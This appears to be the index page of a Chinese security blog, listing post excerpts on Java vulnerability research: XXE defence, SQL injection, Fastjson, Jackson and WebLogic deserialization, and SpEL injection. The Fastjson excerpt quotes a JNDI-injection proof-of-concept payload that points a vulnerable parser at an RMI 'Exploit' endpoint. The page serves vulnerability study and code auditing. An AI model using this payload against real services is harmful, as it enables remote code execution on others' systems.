Kingkk's Blog

菜的要死

从源码层面看XXE的防御

前言XXE的防御来说,实现方法千奇百怪(这里指的是那些基础库,像apache-poi这种解析excel的XXE,内部还是调用的那些基础库,修复方式当然只要升级对应版本即可) Owasp的修复文档 https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html 主要方式......

Posted by kingkk on 2020-01-19

Java8中两个优雅的特性

前言算是之前写代码的时候学到的两个比较有意思的特性,也是Java8新增的两个功能,其实说到底就是减少了一些nullptr的判断和for循环的遍历,让代码变得更加优雅,可读性更高。 Optional Stream 主要就是如上两个特性,总结的过程中也学了一些以前不知道的特性。 Optional先从Optional来吧,他其实是对原有的数据类型进行了一层包装,将nullptr判断的部分操作进......

Posted by kingkk on 2019-12-16

Jimple in Soot

前言还是一篇类似于笔记一样的东西,我不保证百分百的准确,只是以一种自己能看懂的方式,记录一些自己理解的东西。 主要记录下jimple,也就是Soot中最擅长处理的一种中间代码。(图来源网络) 可以看到还算是一种人类比较好理解的中间代码,并且将一些编译中做的操作给显示的显现了出来(因为本来就是从java字节码反编译过来的) Soot中对这种中间代码建立了一套比较完整的体系来描述,方便人们通过......

Posted by kingkk on 2019-11-21

SQLi in Java

SQLi in JavaSQL注入是Web安全老生常谈的一个话题,这里也没什么新的东西。 由于个人的一些需求,整理了一些Java中可能产生SQL注入的操作,做代码审计的时候可以关注一下。 不足或者错误的地方也麻烦指出。 SQL操作JDBC主要的操作就在 java.sql.Statement 这个接口下 java.sql.Statement.executeQuery java.sq......

Posted by kingkk on 2019-11-21

Fastjson反序列化漏洞 1.2.24-1.2.48

Fastjson中的利用方式讲漏洞前先来说下一些利用方式 来看下第一次漏洞的Poc,一个JNDI注入的利用 1{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true} 个人理解就是,JdbcRowSetImpl这个类......

Posted by kingkk on 2019-07-25

XXE防御笔记

官方防御手册1https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html DocumentBuilderjavax.xml.parsers.DocumentBuilderFactory 禁用外部实体 12345678910111213141516171819202......

Posted by kingkk on 2019-07-21

Jackson-databind 反序列化分析

Jackson基础操作主要功能就是在java类与json字符串中间进行序列化与反序列化的操作。 序列化与反序列化java bean 12345678910111213141516171819202122232425262728public class Person { private String name; private Integer age; pu......

Posted by kingkk on 2019-05-23

Weblogic XMLDecoder反序列化学习

前言鉴于 @男壹号 大哥的建议,为之前写的一个扫描器又增加了几个POC,顺带学习了下weblogic的几个xmldecoder反序列化漏洞。 CVE-2017-3506 CVE-2017-10271 CVE-2019-2725 由于之前没有本地调试过weblogic的经验,走了不少弯路,也踩了不少坑。安装和调试的过程可以看。 https://badcode.cc/2018/05/20/......

Posted by kingkk on 2019-05-19

SPEL表达式注入-入门篇

SPEL表达式 Spring Expression Language(简称SpEL)是一种强大的表达式语言,支持在运行时查询和操作对象图。语言语法类似于Unified EL,但提供了额外的功能,特别是方法调用和基本的字符串模板功能。同时因为SpEL是以API接口的形式创建的,所以允许将其集成到其他应用程序和框架中。 个人理解就是Spring框架中的一种语言表达式,类似于Struts2中的O......

Posted by kingkk on 2019-05-09

Java反序列之从萌新到菜鸟

前言距离上一次更新博客差不多已经过去一个月了,中间的事情确实也很多。最近勉强把Java的基础给补了,就来记录一下Java中最经典的反序列化漏洞。 序列化与反序列化序列化Java中并非所有的数据类型都可以进行序列化,想要进行序列化和反序列化的数据结构需要使用Serializable这样一个接口。例如下面这个类 123456public class Employee implements Ser......

Posted by kingkk on 2019-01-18

FEATURED TAGS
writeup 代码审计 反序列化 python java Java 漏洞分析 php weblogic XXE vulnhub 练习记录 渗透测试 xss ctf
ABOUT ME
FRIENDS